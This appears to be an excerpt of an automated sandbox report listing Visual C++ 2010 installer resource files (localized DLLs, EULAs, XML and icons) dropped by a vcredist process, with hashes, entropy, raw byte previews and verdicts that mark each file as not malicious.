.C.A.B.0.=.>.2.8.B.L. .=.0. .4.0.=.=.C.N. .?.;.0.B.D.>.@.<.C.

C:\4863269369430a9b27\1049\SetupResources.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17752
Entropy (8bit):	5.661156120079437
Encrypted:	false
SSDEEP:	192:nRBgnUfwVWBCl23DV3SD1tt9WfXHT7nMcPxeWlQKPnEtObMacxc8hjeyveCXFqPr:n/v65URiD1vwLoeeWlLXci2jpvyPr
MD5:	9FA7457ABFA95BBE8E8A7814095A9A8B
SHA1:	BC320ED0BC482B11FE23DB21755A95C2F262A765
SHA-256:	13DA0002D2491526C53A892B2250D321F22A24FAE67544488D70BD059AD27229
SHA-512:	189326EA549F217A2154CAB4A7EA444D3F51BF00929FD2A6F108150E13F0B42B08B006860DDAC6044C9E9D44859A579705FCACCCF81FE5860E1E94F5994AD12B
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l...............{%......{".....Rich............PE..L...0<_M.........."!.........,...............................................P......=.....@.......................................... .................X............................................................................................text...G...........................@..@.rsrc....0... .....................@..@............0<_M........+...........RSDS..{.9..H...S-.>B....SetupResources.pdb..................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\4863269369430a9b27\1049\eula.rtf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	Rich Text Format data, version 1, ANSI
Category:	dropped
Size (bytes):	26856
Entropy (8bit):	3.646005856063089
Encrypted:	false
SSDEEP:	384:spSEbldVGRw5rF7TavN0rDSIyshfe0s8q1vi8eonN7Uii6sCbDS5gLDPw9LVxOik:y/Vl6Q/u/GgXPw9JQ98aCfHZ/G
MD5:	156313549F1D699ECF7922F27B9F554C
SHA1:	C11E59A96C7FA5081AEBBD82A7CB928D18B766EB
SHA-256:	3794117C849778FE43BE7DA7EE160FDBBC41C8B6F24EFE4CEEDDD6738D731B1E
SHA-512:	02D386E6D08C581435053FF61F8104F47A58EBE1C988F6696B6C755CC99FC07C033EF717FD21EF8004B2C68A59656795990F49FBD224B635386895E43A48FAA3
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fswiss\fprq2\fcharset204 Tahoma Cyr;}{\f1\fswiss\fprq2\fcharset0 Tahoma;}{\f2\froman\fprq2\fcharset2 Symbol;}{\f3\fswiss\fprq2\fcharset0 Trebuchet MS;}{\f4\fnil\fcharset0 Calibri;}}..{\colortbl ;\red0\green0\blue255;}..{\stylesheet{ Normal;}{\s1 heading 1;}{\s2 heading 2;}}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1049\b\f0\fs20\'d3\'d1\'cb\'ce\'c2\'c8\'df \'cb\'c8\'d6\'c5\'cd\'c7\'c8\'c8 \'cd\'c0 \'c8\'d1\'cf\'ce\'cb\'dc\'c7\'ce\'c2\'c0\'cd\'c8\'c5 \'cf\'d0\'ce\'c3\'d0\'c0\'cc\'cc\'cd\'ce\'c3\'ce \'ce\'c1\'c5\'d1\'cf\'c5\'d7\'c5\'cd\'c8\'df MICROSOFT\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120 MICROSOFT VISUAL C++ 2010 RUNTIME LIBRARIES WITH SERVICE PACK 1\par..\pard\nowidctlpar\sb120\sa120\lang1049\b0\f0\'dd\'f2\'e8 \'f3\'f1\'eb\'ee\'e2\'e8\'ff \'eb\'e8\'f6\'e5\'ed\'e7\'e8\'e8 \'ff\'e2\'eb\'ff\'fe\'f2\'f1\'ff \'f1\'ee\'e3\'eb\'e0\'f8\'e5\'ed\'e8\'e5\'ec \

C:\4863269369430a9b27\2052\LocalizedData.xml

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	31138
Entropy (8bit):	4.240036868712424
Encrypted:	false
SSDEEP:	192:4QD7cJwYXzOnyqqgafOAXUmUfMcq0JywXk83GJPupIoxnb/2v:4QD7cJxXC/qgaffXUmUi0JyoknJY9b+v
MD5:	150B5C3D1B452DCCBE8F1313FDA1B18C
SHA1:	7128B6B9E84D69C415808F1D325DD969B17914CC
SHA-256:	6D4EB9DCA1CBCD3C2B39A993133731750B9FDF5988411F4A6DA143B9204C01F2
SHA-512:	A45A1F4F19A27558E08939C7F63894FF5754E6840DB86B8C8C68D400A36FB23179CAFF164D8B839898321030469B56446B5A8EFC5765096DEE5E8A746351E949
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".dk.[..z.^..Bl.O(u .x.6.4. .s^.S.0.N..(Wdks^.S.N.[.dk.z.^.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".dk.[..z.^..Bl.O(u .I.A.6.4. .s^.S.0.N..(Wdks^.S.N.[.dk.z.^.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.S.u.p.p.o.r.t.e.d.O.S.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".dk.d\O.\|.~.N/e.c .M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.0. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e..0"./.>..... . . . . . .<.

C:\4863269369430a9b27\2052\SetupResources.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13656
Entropy (8bit):	6.174620629388967
Encrypted:	false
SSDEEP:	192:2s8nUfwVWtTXjuQShyjK7o0WtEW2QKPnEtObMacxc8hjeyveCXi:pTCTFhMKFWtEW2LXci2jpvM
MD5:	E4131092F32928A45757622C6B43B906
SHA1:	AC6A465AE3EFE8CA55115B0F49FD5CC0F76C1343
SHA-256:	FD66A26672E981987D92549F966E9095988D49FA5025C38CB90CFB9BCFF52268
SHA-512:	A76F1FAA61418B0F1A0401255FE9CA3CAA32A3F9D1CE2BB5A0D6EEECE793470EDF565E2EB6A8FC90FB6FC70004F2C2D1FAABE14F86754BBC9809669888188F73
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l...............{%......{".....Rich............PE..L...0<_M.........."!.........................................................@....../.....@.......................................... ..................X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@............0<_M........+...........RSDS..{.9..H...S-.>B....SetupResources.pdb..................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\4863269369430a9b27\2052\eula.rtf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	Rich Text Format data, version 1, ANSI
Category:	dropped
Size (bytes):	16242
Entropy (8bit):	4.055338447097465
Encrypted:	false
SSDEEP:	384:6WOmTYUI1tR+PZBZNgANlPLE3o14BI3G7288GKGfPt0iswGcq8Z2:NU/+PZ5zOmqf1c
MD5:	8667C04407DF32DBAE7C7553C5963745
SHA1:	901E33C831A89062391252AE7F581CDB1D8FB275
SHA-256:	E8B2AF11A0C37B6085FAFB053EC1C66454EF1B58C65CA45422B9150B9D2D37FC
SHA-512:	79EC3C43FF5E599022EAD3B86367DD202A9138CF50EAEEB6106D8313CEACBFBC432E101BFB48CA2C6B43887B3738AE7470F2473D1A84CFFD6B2B882AE893E1B7
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\fnil\fprq2\fcharset134 SimSun;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\froman\fprq2\fcharset2 Symbol;}{\f4\fnil\fcharset0 Calibri;}}..{\colortbl ;\red0\green0\blue255;}..{\stylesheet{ Normal;}{\s1 heading 1;}{\s2 heading 2;}}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs20 MICROSOFT\f1\'c8\'ed\'bc\'fe\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0 MICROSOFT VISUAL C++ 2010 RUNTIME LIBRARIES WITH SERVICE PACK 1\par..\pard\nowidctlpar\sb120\sa120\lang2052\b0\f1\'b1\'be\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\'ca\'c7\lang1033\f0 Microsoft Corporation\f1\'a3\'a8\lang2052\'bb\'f2\'c4\'fa\'cb\'f9\'d4\'da\'b5\'d8\'b5\'c4\lang1033\f0 Microsoft Corporation \lang2052\f1\'b9\'d8\'c1\'aa\'b9\'ab\'cb\'be\lang1033\'a3\'a9\lang2052\'d3\'eb\'c4\'fa\'d6\'ae\'bc\'e4\'b4\'ef\'b3\'c9\'b5\'c4\'d0\'ad\'d2\'e9\'a1\'a3\

C:\4863269369430a9b27\3082\LocalizedData.xml

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	40912
Entropy (8bit):	3.5296761558263756
Encrypted:	false
SSDEEP:	384:4fcA4U4d+uYWFHO/xGeftjG2QDu7Jr++dP8z3AzOrv:BoZWFu//xWCJi8Pg32Y
MD5:	05A95593C61C744759E52CAF5E13502E
SHA1:	0054833D8A7A395A832E4C188C4D012301DD4090
SHA-256:	1A3E5E49DA88393A71EA00D73FEE7570E40EDB816B72622E39C7FCD09C95EAD1
SHA-512:	00AEE4C02F9D6374560F7D2B826503AAB332E1C4BC3203F88FE82E905471EC43F92F4AF4FC52E46F377E4D297C2BE99DAF94980DF2CE7664C169552800264FD3
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".E.s.t.e. .p.r.o.g.r.a.m.a. .d.e. .i.n.s.t.a.l.a.c.i...n. .r.e.q.u.i.e.r.e. .u.n.a. .p.l.a.t.a.f.o.r.m.a. .x.6.4... .N.o. .s.e. .p.u.e.d.e. .i.n.s.t.a.l.a.r. .e.n. .e.s.t.a. .p.l.a.t.a.f.o.r.m.a..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".E.s.t.e. .p.r.o.g.r.a.m.a. .d.e. .i.n.s.t.a.l.a.c.i...n. .r.e.q.u.i.e.r.e. .u.n.a. .p.l.a.t.a.f.o.r.m.a. .I.A.6.4... .N.o. .s.e. .p.u.e.d.e. .i.n.s.t.a.l.a.r. .e.n. .e.s.t.a. .p.l.a.t.

C:\4863269369430a9b27\3082\SetupResources.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18264
Entropy (8bit):	5.289331878496675
Encrypted:	false
SSDEEP:	192:EiknnUfwVWVCe8b1S2U85ZTYG11mWPeWfQKPnEtObMacxc8hjXHUz1TrOB4i3f:Elq6Lbg2zZTf11mWPeWfLXci2jXHUwp
MD5:	B5BAC5815E01A14C21B00B1B75BEE7A2
SHA1:	07BEA6680D51C83D230CE9F8E849C34135BA0C50
SHA-256:	8BA0DBB6CFF5FF4269946EC67E6F64D15083414E34646E60E18A548AFED91DFF
SHA-512:	FDBCF102663FFD3AD615022E99B7703C9C66654FAB8E50ED580859E3334519EC99A45B931C1BA5498C92D2D56A2CB7B8A48E8AA3F061F27F7E8F6DF5D6EBB5F9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l...............{%......{".....Rich............PE..L...0<_M.........."!.........................................................P......V.....@.......................................... .. *...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@............0<_M........+...........RSDS..{.9..H...S-.>B....SetupResources.pdb..................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\4863269369430a9b27\3082\eula.rtf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	Rich Text Format data, version 1, ANSI
Category:	dropped
Size (bytes):	10271
Entropy (8bit):	5.161891329008937
Encrypted:	false
SSDEEP:	192:LfKlBfh7TJRSB4w6Fzm3Iuksbhu9+9GQwEeocPztyv5vFvAtUtBrCl7Yuk3LrC9w:+Pfh7TD649F63Iufbg9euEeLhMvmSQKT
MD5:	D64D283F0AA734CDB9EDF02A6D92334B
SHA1:	3D90A22FE198BA9E4A46D7CC78EC91DA05D29E80
SHA-256:	7E1B4CFDE7EA549360A3B323E720F1A6CB58C64AAE823650DA5A5FFB127FE645
SHA-512:	D54FF0BED510E84A4584F33588753B10EE7E5E2CCE95A5A834C5CE06486D683CA903F28A6E8D45C56BBE903A078367CFF8A2AFB3A2061545E5C34FA6ADDEB1CE
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\froman\fprq2\fcharset2 Symbol;}{\f3\fnil\fcharset0 Calibri;}}..{\colortbl ;\red0\green0\blue255;}..{\stylesheet{ Normal;}{\s1 heading 1;}{\s2 heading 2;}}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1034\b\f0\fs20 T\'c9RMINOS DE LICENCIA DEL SOFTWARE DE MICROSOFT\lang3082\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\lang1034\f0 MICROSOFT\lang3082 VISUAL C++ 2010 RUNTIME LIBRARIES WITH SERVICE PACK 1\f1\par..\pard\nowidctlpar\sb120\sa120\lang1034\b0\f0 Los presentes t\'e9rminos de licencia son un contrato entre Microsoft Corporation (o, en funci\'f3n del pa\'eds en que usted resida, una de las sociedades de su grupo) y usted.\lang3082 \lang1034 S\'edrvase leerlos detenidamente.\lang3082 \lang1034 Son de aplicaci\'f3n al software\lang3082 \lang1034 arriba mencionado, el cual incluye los s

C:\4863269369430a9b27\DHtmlHeader.html

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	HTML document, Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	16118
Entropy (8bit):	3.6434775915277604
Encrypted:	false
SSDEEP:	192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
MD5:	CD131D41791A543CC6F6ED1EA5BD257C
SHA1:	F42A2708A0B42A13530D26515274D1FCDBFE8490
SHA-256:	E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
SHA-512:	A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
Malicious:	false
Preview:	..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

C:\4863269369430a9b27\DisplayIcon.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 13 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
Category:	dropped
Size (bytes):	88533
Entropy (8bit):	7.210526848639953
Encrypted:	false
SSDEEP:	1536:xWayqxMQP8ZOs0JOG58d8vo2zYOvvHAj/4/aXj/Nhhg73BVp5vEdb:e/gB4H8vo2no0/aX7C7Dct
MD5:	F9657D290048E169FFABBBB9C7412BE0
SHA1:	E45531D559C38825FBDE6F25A82A638184130754
SHA-256:	B74AD253B9B8F9FCADE725336509143828EE739CC2B24782BE3ECFF26F229160
SHA-512:	8B93E898148EB8A751BC5E4135EFB36E3AC65AF34EAAC4EA401F1236A2973F003F84B5CFD1BBEE5E43208491AA1B63C428B64E52F7591D79329B474361547268
Malicious:	false
Preview:	..............(...............h...............h...f... .............. .............. ..........^...00......h....#..00..........n)..00...........8........ .h....T.. .... .....&Y..00.... ..%...i........ ._...v...(....... ....................................................................................................w......x......................x..ww...........h...............................w.....w.x..........x................xwvwg.................................................................(....... ...................................jO:.mS?.qWD.v\I.\|cP..kX..q_..sa..yg..{j...p..nh..pj..uo..\|u..xq..\|r..\|u..rx..zy..\|w.}.y...q...d...y...{......S...]..d..i..r..\|...j..j...y...e...k...l..q...y...~...v...y..s..s..m...m...l...n...k...t...l.............................................................................................................................................................................................

C:\4863269369430a9b27\Graphics\Print.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
Category:	dropped
Size (bytes):	1150
Entropy (8bit):	4.923507556620034
Encrypted:	false
SSDEEP:	24:dOjNyw2aSGZHJi4U7Wf0mDX+QF7s/AemFAh:MjNyw/0NW9DOp/ANC
MD5:	7E55DDC6D611176E697D01C90A1212CF
SHA1:	E2620DA05B8E4E2360DA579A7BE32C1B225DEB1B
SHA-256:	FF542E32330B123486797B410621E19EAFB39DF3997E14701AFA4C22096520ED
SHA-512:	283D381AA396820B7E15768B20099D67688DA1F6315EC9F7938C2FCC3167777502CDED0D1BEDDF015A34CC4E5D045BCB665FFD28BA2FBB6FAF50FDD38B31D16E
Malicious:	false
Preview:	............ .h.......(....... ..... .....@.........................................................................................t?.fR.\|bN.y_K.v\H.rXD.oUA.kQ=.hN:.eK7.cI5.cI5.cI5i.........th<..z............................................cI5.cI5...................................................qXE.cI5.cI5.......~.............................................}eS.kR>.cI5......................................................q`.w^L.cI5..............................z..~n..sb..jX.{bP.t[H..~m..kY.nT@.......................................................{..wf.zaM.......vO.......................q..r`.}cQ.w]J..lZ.......t.x^J...........}Z..................................z`M........{aM...............0..............................jY.{aO...........................................................x^K.x^Kk.....................................................n\.y_L...........................r...............................y_L.x^K&.........................s.............

C:\4863269369430a9b27\Graphics\Rotate1.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:	dropped
Size (bytes):	894
Entropy (8bit):	2.5118974066097444
Encrypted:	false
SSDEEP:	6:kRKqNllGuv/ll2dL/rK//dlQt0tlWMlMN8Fq/wbD4tNZDlNc367YCm6p+Wvtjlpr:pIGOmDAQt8n+uNbctNZ5w6AsXjKHRp5c
MD5:	26A00597735C5F504CF8B3E7E9A7A4C1
SHA1:	D913CB26128D5CA1E1AC3DAB782DE363C9B89934
SHA-256:	37026C4EA2182D7908B3CF0CEF8A6F72BDDCA5F1CFBC702F35B569AD689CF0AF
SHA-512:	08CEFC5A2B625F261668F70CC9E1536DC4878D332792C751884526E49E7FEE1ECFA6FCCFDDF7BE80910393421CC088C0FD0B0C27C7A7EFF2AE03719E06022FDF
Malicious:	false
Preview:	..............h.......(....... .......................................................................................................................................................................................t.r........................................p.nn.l\|.z..........................................g.e.......................................................................................P.N..........................................P.OG.FP.O..........................................?.>...................................................................................................+...........................................3.2%.$+...........................................!. ............{.{.............................................................................................~.~..................................G.......................................G..........

C:\4863269369430a9b27\Graphics\Rotate2.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:	dropped
Size (bytes):	894
Entropy (8bit):	2.5178766234336925
Encrypted:	false
SSDEEP:	12:pmZX5+9wQaxWbwW3h/7eHzemn0iLHRp5c:Md5EaxWbh/Cnt4
MD5:	8419CAA81F2377E09B7F2F6218E505AE
SHA1:	2CF5AD8C8DA4F1A38AAB433673F4DDDC7AE380E9
SHA-256:	DB89D8A45C369303C04988322B2774D2C7888DA5250B4DAB2846DEEF58A7DE22
SHA-512:	74E504D2C3A8E82925110B7CFB45FDE8A4E6DF53A188E47CF22D664CBB805EBA749D2DB23456FC43A86E57C810BC3D9166E7C72468FBD736DA6A776F8CA015D1
Malicious:	false
Preview:	..............h.......(....... ...............................................................................................................................................................................................................................................................................................................................................................................r.p..........................................q.oj.hq.o..........................................b.`...................................................................................................J.I..................\|.\|...y.y...............Q.PC.BF.E..........................................>.=.........".!..........................................2.1".!'.&..........................................".!.....................................G.......................................G..........

C:\4863269369430a9b27\Graphics\Rotate3.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:	dropped
Size (bytes):	894
Entropy (8bit):	2.5189797450574103
Encrypted:	false
SSDEEP:	12:pPrMIMxPWk3AyORrabBQ+gra2/MXWM4xfQHRp5c:1gxPbXlBQ+gr1ffO4
MD5:	924FD539523541D42DAD43290E6C0DB5
SHA1:	19A161531A2C9DBC443B0F41B97CBDE7375B8983
SHA-256:	02A7FE932029C6FA24D1C7CC06D08A27E84F43A0CBC47B7C43CAC59424B3D1F6
SHA-512:	86A4C5D981370EFA20183CC4A52C221467692E91539AC38C8DEF1CC200140F6F3D9412B6E62FAF08CA6668DF401D8B842C61B1F3C2A4C4570F3B2CEC79C9EE8B
Malicious:	false
Preview:	..............h.......(....... .................................................................................................................................................................................................................................................................................................................................................................................................................z.z...{.{...........................................................................................................................................................s.q..........................................y.wl.jl.j...............3.2#."*.)..................f.d.........E.D.........(.'..............................U.TE.DF.E..........................................E.D.....................................G.......................................G..........

C:\4863269369430a9b27\Graphics\Rotate4.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:	dropped
Size (bytes):	894
Entropy (8bit):	2.5119705312617957
Encrypted:	false
SSDEEP:	6:kRK///FleTxml+SzNaoT9Q0/lHOmMdrYln8OUo/XRWl2XOXFBYpqnHp/p5c:p///FPwxUrMunUofRReFNHRp5c
MD5:	BB55B5086A9DA3097FB216C065D15709
SHA1:	1206C708BD08231961F17DA3D604A8956ADDCCFE
SHA-256:	8D82FF7970C9A67DA8134686560FE3A6C986A160CED9D1CC1392F2BA75C698AB
SHA-512:	DE9226064680DA6696976A4A320E08C41F73D127FBB81BF142048996DF6206DDB1C2FE347C483CC8E0E50A00DAB33DB9261D03F1CD7CA757F5CA7BB84865FCA9
Malicious:	false
Preview:	..............h.......(....... .............................................................................................................................................................................................................y.y...\|.\|.............................................................................................................................................................................................................................................,.+".!,.+.........................................(.'......................................................................................=.<..........................................S.RC.BG.F.............................j.h.........H.G..............................y.wj.hi.g..........................................j.h.....................................G.......................................G..........

C:\4863269369430a9b27\Graphics\Rotate5.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:	dropped
Size (bytes):	894
Entropy (8bit):	2.5083713071878764
Encrypted:	false
SSDEEP:	6:kRKi+Blqkl/QThulVDYa5a//ItEl/aotzauakg//5aM1lkl05Kaag2/JqnHp/p5c:pXBHehqSayIylrtBg/bk4AgzHRp5c
MD5:	3B4861F93B465D724C60670B64FCCFCF
SHA1:	C672D63C62E00E24FBB40DA96A0CC45B7C5EF7F0
SHA-256:	7237051D9AF5DB972A1FECF0B35CD8E9021471740782B0DBF60D3801DC9F5F75
SHA-512:	2E798B0C9E80F639571525F39C2F50838D5244EEDA29B18A1FAE6C15D939D5C8CD29F6785D234B54BDA843A645D1A95C7339707991A81946B51F7E8D5ED40D2C
Malicious:	false
Preview:	..............h.......(....... .................................................................................................{.{...~.~.......................................................................................}.}.........................................................).(#."2.1..........................................).(...................................................................................................=.<..........................................N.ME.DN.M..........................................M.L.......................................................................................e.c..........................................z.xl.jm.k........................................r.p........................................................................................................................G.......................................G..........

C:\4863269369430a9b27\Graphics\Rotate6.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:	dropped
Size (bytes):	894
Entropy (8bit):	2.5043420982993396
Encrypted:	false
SSDEEP:	12:pjs+/hlRwx5REHevtOkslTaGWOpRFkpRHkCHRp5c:tZ/u+HeilBh/F+Rd4
MD5:	70006BF18A39D258012875AEFB92A3D1
SHA1:	B47788F3F8C5C305982EB1D0E91C675EE02C7BEB
SHA-256:	19ABCEDF93D790E19FB3379CB3B46371D3CBFF48FE7E63F4FDCC2AC23A9943E4
SHA-512:	97FDBDD6EFADBFB08161D8546299952470228A042BD2090CD49896BC31CCB7C73DAB8F9DE50CDAF6459F7F5C14206AF7B90016DEEB1220943D61C7324541FE2C
Malicious:	false
Preview:	..............h.......(....... .................................................................................................... ............................................$.$ ..0./...........................{.{............ ...........<.;..........................................C.BA.@O.N...............{.{...~.~..................G.F..................................................................................................._.]..........................................n.lg.en.l..........................................p.n...............................................................................................................................................................................................................................................................................................................G.......................................G..........

C:\4863269369430a9b27\Graphics\Rotate7.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:	dropped
Size (bytes):	894
Entropy (8bit):	2.4948009720290445
Encrypted:	false
SSDEEP:	6:kRKIekllisUriJ2IP+eX8iDml8mS8+hlxllwqlllkg2klHYdpqnHp/p5c:p8os0iieX8iNVHX//x2sHYdoHRp5c
MD5:	FB4DFEBE83F554FAF1A5CEC033A804D9
SHA1:	6C9E509A5D1D1B8D495BBC8F57387E1E7E193333
SHA-256:	4F46A9896DE23A92D2B5F963BCFB3237C3E85DA05B8F7660641B3D1D5AFAAE6F
